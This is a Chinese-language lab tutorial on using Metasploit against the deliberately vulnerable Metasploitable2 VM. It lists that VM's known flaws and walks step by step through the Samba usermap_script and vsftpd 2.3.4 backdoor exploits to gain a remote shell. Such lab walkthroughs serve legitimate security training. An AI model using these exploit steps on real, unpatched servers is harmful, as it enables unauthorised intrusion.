Metasploit -- 攻击Metasploitable2靶机

简介: Metasploit -- 攻击Metasploitable2靶机

一、Metasploitable2简介

Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。

开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。

Metasploit able 2是一个虚拟机文件, 从网上下载解压之后就可以直接使用,不需要自己安装。

下载地址:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

用户名:msfadmin 密码:msfadmin

二、Metasploitable2漏洞列表

1、弱口令漏洞(如vnc、mysql、PostgreSQL等)

2、Samba MS-RPC Shell命令注入漏洞

3、Vsftpd源码包后门漏洞

4、UnreallRCd后门漏洞

5、Linux NFS共享目录配置漏洞

6、Java RMI SERVER命令执行漏洞

7、Tomcat管理台默认口令漏洞

8、root用户弱口令漏洞(SSH爆破)

9、Distcc后门漏洞

10、Samba sysmlink默认配置目录遍历漏洞

11、PHP CGI参数注入执行漏洞

12、DRuby远程代码执行漏洞

13、Ingreslock后门漏洞

14、Rlogin后门漏洞

三、Samba MS-RPC Shell命令注入漏洞

漏洞产生原因:传递通过MS-RPC提供的未过滤的用户 输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。

攻击机:kali linux IP:192.168.1.133

靶机:Metasploitable2 IP:192.168.1.131

1、启动数据库并且打开metasploit控制台:msfconsole

0a2653c851af460fa595bd959398a8f1.png

2、搜索可利用的模块:search samba

0eacb84100b54626af849e6b562bf92a.png

3、选择要利用的模块:use exploit/multi/samba/usermap_script

查看需要设置的参数:show options

需要设置目标ip和端口(默认139)

2d65d23f6d4748949b924e4057485923.png

4、设置目标主机地址:192.168.1.131

2e9b90b2ca334476abebe75bafe6eeaa.png

5、运行:run 此时已建立shell连接

4cebaac233b3433da32a72337a77fc60.png

6、查看目标主机目录文件:ls

6de278e6d6694ce5bb08e7e842b7e74b.png

四、Vsftpd源码包后门漏洞

漏洞产生原因:在特定版本的vsftpd服务器程序中, 被人恶意植入代码,当用户名以“: )”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。

攻击机:kali linux IP:192.168.1.133

靶机:Metasploitable2 IP:192.168.1.136

1、搜索可用攻击模块:search vsftpd

0a2653c851af460fa595bd959398a8f1.png

2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor

查看需要设置的参数:show options

需要设置目标ip和端口(默认21)

0eacb84100b54626af849e6b562bf92a.png

3、设置目标主机地址:192.168.1.136

2d65d23f6d4748949b924e4057485923.png

4、 运行:run 此时已建立shell连接

2e9b90b2ca334476abebe75bafe6eeaa.png

5、查看目标主机目录文件:ls

4cebaac233b3433da32a72337a77fc60.png

禁止非法,后果自负

目录
相关文章
|
安全 Java 测试技术
如何搭建 WebGoat 靶场保姆级教程(附链接)
如何搭建 WebGoat 靶场保姆级教程(附链接)
|
安全 Ubuntu Shell
深入解析 vsftpd 2.3.4 的笑脸漏洞及其检测方法
本文详细解析了 vsftpd 2.3.4 版本中的“笑脸漏洞”,该漏洞允许攻击者通过特定用户名和密码触发后门,获取远程代码执行权限。文章提供了漏洞概述、影响范围及一个 Python 脚本,用于检测目标服务器是否受此漏洞影响。通过连接至目标服务器并尝试登录特定用户名,脚本能够判断服务器是否存在该漏洞,并给出相应的警告信息。
1087 84
|
网络协议 Shell 网络安全
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
这是一篇关于网络安全攻防的详细分析文章,主要讲述了新手如何通过VulnHub靶场中的MoneyBox:1来学习渗透测试的过程。文章首先介绍了环境配置,包括导入虚拟机和网络设置。接着,通过nmap工具扫描目标IP,发现了FTP服务和SSH服务。通过dirsearch工具爆破FTP服务,获取了用户名renu和密码987654321。使用该信息登录FTP,找到了一个提示性的图片,通过steghide工具发现了一个隐藏的数据文件,并通过SSH公钥验证登录
958 1
|
监控 负载均衡 网络协议
利用hping3进行传输层拒绝服务攻击实验
本文介绍如何使用Kali Linux和hping3工具对Metasploitable Linux靶机执行传输层拒绝服务(DoS)攻击实验。实验环境包括攻击机(Kali Linux,IP:192.168.1.30)和靶机(Metasploitable2 Linux,IP:192.168.1.45)。通过SYN Flood和UDP Flood攻击,展示了DoS攻击的工作原理及其对目标系统的影响。文章还提供了防御建议,如启用防火墙规则、配置负载均衡和使用入侵检测系统等,帮助网络安全工程师更好地应对此类攻击。
1974 5
|
存储 网络协议 安全
Kali渗透测试:拒绝服务攻击(二)
Kali渗透测试:拒绝服务攻击(二)
1393 0
|
网络协议 安全 生物认证
一文带你从了解到精通Nmap扫描器
一文带你从了解到精通Nmap扫描器
|
网络协议 安全 Linux
嗅探神器:Ettercap 保姆级教程
嗅探神器:Ettercap 保姆级教程
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
3786 5
ms17-010(永恒之蓝)漏洞复现
|
安全 测试技术 PHP
如何搭建 sqli-labs 靶场保姆级教程(附链接)
如何搭建 sqli-labs 靶场保姆级教程(附链接)